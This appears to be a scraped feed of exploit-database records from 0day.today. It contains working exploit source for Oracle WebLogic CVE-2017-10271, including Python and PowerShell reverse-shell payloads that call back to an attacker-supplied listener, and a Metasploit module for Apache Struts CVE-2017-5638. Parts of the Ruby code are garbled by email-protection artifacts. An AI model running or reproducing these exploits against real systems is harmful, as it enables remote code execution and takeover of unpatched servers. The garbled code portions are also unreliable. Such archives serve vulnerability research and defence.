E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n 
self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n 
print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-20T05:11:11", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "zdt", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-15T00:00:00", "id": "1337DAY-ID-27316", "href": "https://0day.today/exploit/description/27316", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vunlerability in Apache Struts\r\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. 
Remote Code Execution can be performed\r\n via http Content-Type header.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n 'Author' => [\r\n 'Nike.Zheng', # PoC\r\n 'Nixawk', # Metasploit module\r\n 'Chorder', # Metasploit module\r\n 'egypt', # combining the above\r\n 'Jeffrey Martin', # Java fu\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-5638'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Mar 07 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. 
Cannot contain spaces', 'GET' ])\r\n ]\r\n )\r\n\r\n @data_header = \"X-#{rand_text_alpha(4)}\"\r\n end\r\n\r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n\r\n ognl = \"\"\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|\r\n\r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if resp && resp.code == 200 && resp.headers[var_a]\r\n vprint_good(\"Victim operating system: #{resp.headers[var_a]}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n #when ARCH_JAVA\r\n # datastore['LHOST'] = nil\r\n # resp = send_payload(payload.encoded_jar)\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload(generate_payload_exe)\r\n end\r\n\r\n require'pp'\r\n pp resp.headers if resp\r\n end\r\n\r\n def send_struts_request(ognl, extra_header: '')\r\n uri = normalize_uri(datastore[\"TARGETURI\"])\r\n content_type = \"%{(#_='multipart/form-data').\"\r\n content_type << \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n content_type << \"(#_memberAccess?\"\r\n content_type << \"(#_memberAccess=#dm):\"\r\n content_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n content_type << \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n content_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n content_type << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n content_type << \"(#context.setMemberAccess(#dm)))).\"\r\n content_type << ognl\r\n content_type << \"}\"\r\n\r\n headers = { 'Content-Type' => content_type }\r\n if extra_header\r\n headers[@data_header] = extra_header\r\n end\r\n\r\n #puts content_type.gsub(\").\", \").\\n\")\r\n #puts\r\n\r\n resp = 
Related exploit records (appended 0day.today feed entries; the embedded, partially garbled and truncated exploit source is omitted):

* 1337DAY-ID-27316: Ruby (Metasploit-framework) module source for an Apache Struts 2 OGNL remote code execution exploit. Source: https://0day.today/exploit/27316. Listed 2018-03-20. CVSS 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/).
* 1337DAY-ID-27300: "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution Exploit" (CVE-2017-5638). Description: "Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell." Python script by anarc0der (github.com/anarcoder), tested with tomcat8. Published 2017-03-12. https://0day.today/exploit/description/27300.